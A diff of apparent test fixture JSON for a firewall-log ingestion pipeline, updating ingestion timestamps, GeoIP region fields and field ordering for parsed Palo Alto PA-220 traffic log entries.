@@ -1812,7 +1757,7 @@ }, "event": { "duration": 593000000000, - "ingested": "2021-12-09T13:44:05.031497500Z", + "ingested": "2021-12-14T14:51:01.287200389Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-push-notifications,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,22662,1,55112,443,42021,443,0x400053,tcp,allow,9978,4509,5469,32,2018/11/30 15:58:59,593,computer-and-internet-info,0,32091122,0x0,192.168.0.0-192.168.255.255,United States,0,16,16,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -1840,26 +1785,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 224, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -1981,7 +1921,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031503Z", + "ingested": "2021-12-14T14:51:01.287200926Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -2009,26 +1949,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 117, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2150,7 +2085,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031508400Z", + "ingested": "2021-12-14T14:51:01.287201259Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24107,1,50271,53,48792,53,0x400019,udp,allow,186,69,117,2,2018/11/30 16:08:52,0,any,0,32091124,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", 
@@ -2178,26 +2113,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 307, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2319,7 +2249,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031513800Z", + "ingested": "2021-12-14T14:51:01.287201582Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24063,1,54061,53,2987,53,0x400019,udp,allow,392,85,307,2,2018/11/30 16:08:52,0,any,0,32091125,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -2347,26 +2277,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 365, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -2488,7 +2413,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031519200Z", + "ingested": "2021-12-14T14:51:01.287201900Z", "original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24145,1,52701,53,6945,53,0x400019,udp,allow,440,75,365,2,2018/11/30 16:08:52,0,any,0,32091126,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:24.000-05:00", "timezone": "America/New_York", @@ -2516,26 +2441,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2648,7 +2568,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031524600Z", + "ingested": "2021-12-14T14:51:01.287202213Z", "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24245,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:13,0,any,0,32091127,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:27.000-05:00", "timezone": "America/New_York", 
@@ -2676,26 +2596,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 161, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2817,7 +2732,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:44:05.031530100Z", + "ingested": "2021-12-14T14:51:01.287202693Z", "original": "Nov 30 16:09:28 PA-220 1,2018/11/30 16:09:27,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:27,24167,1,62503,53,42208,53,0x400019,udp,allow,258,97,161,2,2018/11/30 16:08:54,1,any,0,32091128,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:27.000-05:00", "timezone": "America/New_York", @@ -2845,26 +2760,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 7805, - "ip": "175.16.199.1", - "packets": 13 + "packets": 13, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -2986,7 +2896,7 @@ }, "event": { "duration": 17000000000, - "ingested": "2021-12-09T13:44:05.031535500Z", + "ingested": "2021-12-14T14:51:01.287203038Z", "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24212,1,52442,443,14660,443,0x40001c,tcp,allow,9891,2086,7805,27,2018/11/30 16:08:54,17,web-advertisements,0,32091129,0x0,192.168.0.0-192.168.255.255,United States,0,14,13,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:28.000-05:00", "timezone": "America/New_York", @@ -3014,26 +2924,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 6106, - "ip": "175.16.199.1", - "packets": 11 + "packets": 11, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -3155,7 +3060,7 @@ }, "event": { "duration": 17000000000, - "ingested": "2021-12-09T13:44:05.031541Z", + "ingested": "2021-12-14T14:51:01.287203356Z", "original": "Nov 30 16:09:29 PA-220 1,2018/11/30 16:09:28,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:28,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:28,24149,1,52441,443,16483,443,0x40001c,tcp,allow,8460,2354,6106,24,2018/11/30 16:08:54,17,web-advertisements,0,32091130,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:28.000-05:00", "timezone": "America/New_York", @@ -3183,26 +3088,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 196, - "ip": "175.16.199.1", - "packets": 2 + "packets": 2, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -3315,7 +3215,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031546500Z", + "ingested": "2021-12-14T14:51:01.287203683Z", "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24185,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:15,0,any,0,32091131,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", @@ -3343,26 +3243,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 3245, - "ip": "175.16.199.1", - "packets": 17 + "packets": 17, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -3484,7 +3379,7 @@ }, "event": { "duration": 116000000000, - "ingested": "2021-12-09T13:44:05.031551100Z", + "ingested": "2021-12-14T14:51:01.287204010Z", "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,23856,1,52355,80,5570,80,0x40001c,tcp,allow,5790,2545,3245,36,2018/11/30 16:07:16,116,computer-and-internet-info,0,32091132,0x0,192.168.0.0-192.168.255.255,United States,0,19,17,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", @@ -3512,26 +3407,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 179, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -3653,7 +3543,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031555400Z", + "ingested": "2021-12-14T14:51:01.287204390Z", "original": "Nov 30 16:09:30 PA-220 1,2018/11/30 16:09:29,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:29,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:29,24173,1,50196,53,24430,53,0x400019,udp,allow,261,82,179,2,2018/11/30 16:08:57,0,any,0,32091133,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:29.000-05:00", "timezone": "America/New_York", @@ -3681,26 +3571,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 4537, - "ip": "175.16.199.1", - "packets": 12 + "packets": 12, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -3822,7 +3707,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031560800Z", + "ingested": "2021-12-14T14:51:01.287204720Z", "original": "Nov 30 16:09:31 PA-220 1,2018/11/30 16:09:30,012801096514,TRAFFIC,start,2049,2018/11/30 16:09:30,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,traps-management-service,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:30,24257,1,52454,443,12122,443,0x400053,tcp,allow,6295,1758,4537,25,2018/11/30 16:09:13,0,computer-and-internet-info,0,32091134,0x0,192.168.0.0-192.168.255.255,United States,0,13,12,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:30.000-05:00", "timezone": "America/New_York", @@ -3850,26 +3735,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 4282, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -3991,7 +3871,7 @@ }, "event": { "duration": 13000000000, - "ingested": "2021-12-09T13:44:05.031566600Z", + "ingested": "2021-12-14T14:51:01.287205150Z", "original": "Nov 30 16:09:33 PA-220 1,2018/11/30 16:09:32,012801096514,TRAFFIC,drop,2049,2018/11/30 16:09:32,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:32,24090,1,52445,4282,49145,4282,0x400019,tcp,allow,624,624,0,8,2018/11/30 16:09:12,13,any,0,32091135,0x0,192.168.0.0-192.168.255.255,United States,0,8,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:32.000-05:00", "timezone": "America/New_York", @@ -4019,26 +3899,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4151,7 +4026,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031570500Z", + "ingested": "2021-12-14T14:51:01.287205476Z", "original": "Nov 30 16:09:34 PA-220 1,2018/11/30 16:09:33,012801096514,TRAFFIC,deny,2049,2018/11/30 16:09:33,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:33,24242,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:19,0,any,0,32091136,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:33.000-05:00", "timezone": "America/New_York", 
@@ -4179,26 +4054,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 130, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4320,7 +4190,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031575Z", + "ingested": "2021-12-14T14:51:01.287205803Z", "original": "Nov 30 16:09:35 PA-220 1,2018/11/30 16:09:34,012801096514,TRAFFIC,,2049,2018/11/30 16:09:34,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:34,24190,1,35485,53,33110,53,0x400019,udp,allow,215,85,130,2,2018/11/30 16:09:02,0,any,0,32091137,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:34.000-05:00", "timezone": "America/New_York", @@ -4345,26 +4215,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 1991, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -4486,7 +4351,7 @@ }, "event": { "duration": 15000000000, - "ingested": "2021-12-09T13:44:05.031580400Z", + "ingested": "2021-12-14T14:51:01.287206195Z", "original": "Nov 30 16:09:38 PA-220 1,2018/11/30 16:09:37,012801096514,TRAFFIC,test,2049,2018/11/30 16:09:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:37,23892,1,62730,443,9299,443,0x400019,udp,allow,4867,2876,1991,12,2018/11/30 16:07:20,15,any,0,32091138,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:37.000-05:00", "timezone": "America/New_York", @@ -4511,26 +4376,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 523, - "ip": "175.16.199.1", - "packets": 5 + "packets": 5, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -4652,7 +4512,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031584700Z", + "ingested": "2021-12-14T14:51:01.287206515Z", "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:38.000-05:00", "timezone": "America/New_York", @@ -4680,26 +4540,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 2428, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
@@ -4821,7 +4676,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031589100Z", + "ingested": "2021-12-14T14:51:01.287206846Z", "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:38.000-05:00", "timezone": "America/New_York", @@ -4849,26 +4704,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4981,7 +4831,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031592700Z", + "ingested": "2021-12-14T14:51:01.287207167Z", "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", 
@@ -5009,26 +4859,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 196, - "ip": "175.16.199.1", - "packets": 2 + "packets": 2, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5141,7 +4986,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031597200Z", + "ingested": "2021-12-14T14:51:01.287207490Z", "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", @@ -5169,26 +5014,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 5003, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" 
